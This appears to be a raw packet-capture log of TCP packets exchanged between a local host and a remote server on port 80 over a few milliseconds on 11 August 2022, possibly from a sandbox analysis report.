Aug 11, 2022 06:57:07.485366106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485378981 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485385895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485403061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485419035 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485419989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485435963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.485439062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485466003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.485500097 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.488812923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488832951 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488847971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488863945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488881111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488897085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488914013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488930941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488948107 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.488951921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.488991022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.489011049 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.497306108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497327089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497339010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497476101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.497791052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497811079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497822046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497837067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497848034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497862101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497895002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497906923 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.497911930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497924089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.497929096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497946978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497958899 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.497963905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497971058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.497982025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.497998953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.498013973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.498018026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.498037100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.498059034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.501400948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.501418114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.501432896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.501450062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.501665115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.501925945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.501976967 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.501991987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502002954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502006054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502037048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502041101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502059937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502068043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502077103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502093077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502103090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502109051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502125978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502125978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502140999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502151012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502156973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502173901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502182007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502191067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502203941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502209902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502226114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502235889 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502240896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502258062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502279043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502285004 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502285004 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502295017 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502305031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502321005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502336979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502348900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502351999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502357960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502368927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502381086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502387047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502403975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502407074 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502420902 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502424002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502439022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502455950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502470970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502470970 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502480030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502487898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502504110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502511978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502518892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502536058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502545118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502553940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502564907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502569914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502587080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502595901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502603054 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502619028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502634048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502635002 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502649069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502664089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502665997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502682924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502693892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502697945 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502713919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502728939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502732038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502746105 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502751112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502762079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502777100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502777100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502791882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502808094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502811909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502823114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502832890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502837896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502851963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502855062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502871037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502886057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502895117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502902031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502914906 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502918005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502933979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502934933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502952099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502968073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.502971888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.502985001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503000021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503002882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503010988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503015995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503046989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503048897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503072023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503079891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503092051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503101110 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503113031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503113985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503134966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503133059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503154993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503160000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503175020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503179073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503196955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503204107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503217936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503238916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503240108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503247976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503263950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503263950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503279924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503285885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503308058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503310919 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503323078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503329039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503351927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503366947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503367901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503388882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503410101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503428936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503448009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503468990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503487110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503506899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503525972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503544092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503563881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503582954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503593922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503603935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503607035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503626108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503633022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503647089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503659010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503668070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503683090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503689051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503703117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503710032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503727913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503731012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503742933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503751993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503762960 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503773928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503782034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503796101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503807068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503815889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503825903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503837109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503849983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503858089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503865957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503878117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503884077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503899097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503910065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503918886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503928900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503942013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503947973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503963947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503966093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.503984928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.503993034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504007101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504010916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504028082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504029036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504050016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504054070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504070997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504081011 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504091978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504101038 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504122972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504125118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504143953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504163980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504164934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504185915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504185915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504194975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504209042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504228115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504230022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504237890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504250050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504264116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504271030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504283905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504292011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504302979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504312992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504317999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504334927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504347086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504354954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504369020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504376888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504398108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504399061 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504417896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504420042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504461050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504472017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504492044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504538059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.504544973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.504607916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.505569935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.505614996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.505635023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.505641937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.505697966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.507133961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.507181883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.507203102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.507205009 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.507261992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.508272886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.508295059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.508315086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.508347034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.508369923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.508398056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.508415937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.508455992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.509254932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509303093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509322882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509325027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.509344101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509365082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509368896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.509386063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509391069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.509407043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509428024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509430885 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.509448051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.509453058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.509485006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.509510994 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.510282993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510344028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.510345936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510366917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510387897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510407925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510416031 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.510427952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510428905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.510448933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510468960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510479927 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.510488987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.510499954 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.510544062 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.512373924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.512402058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.512418985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.512439013 CEST	80	49736	89.208.103.4	192.168.2.3
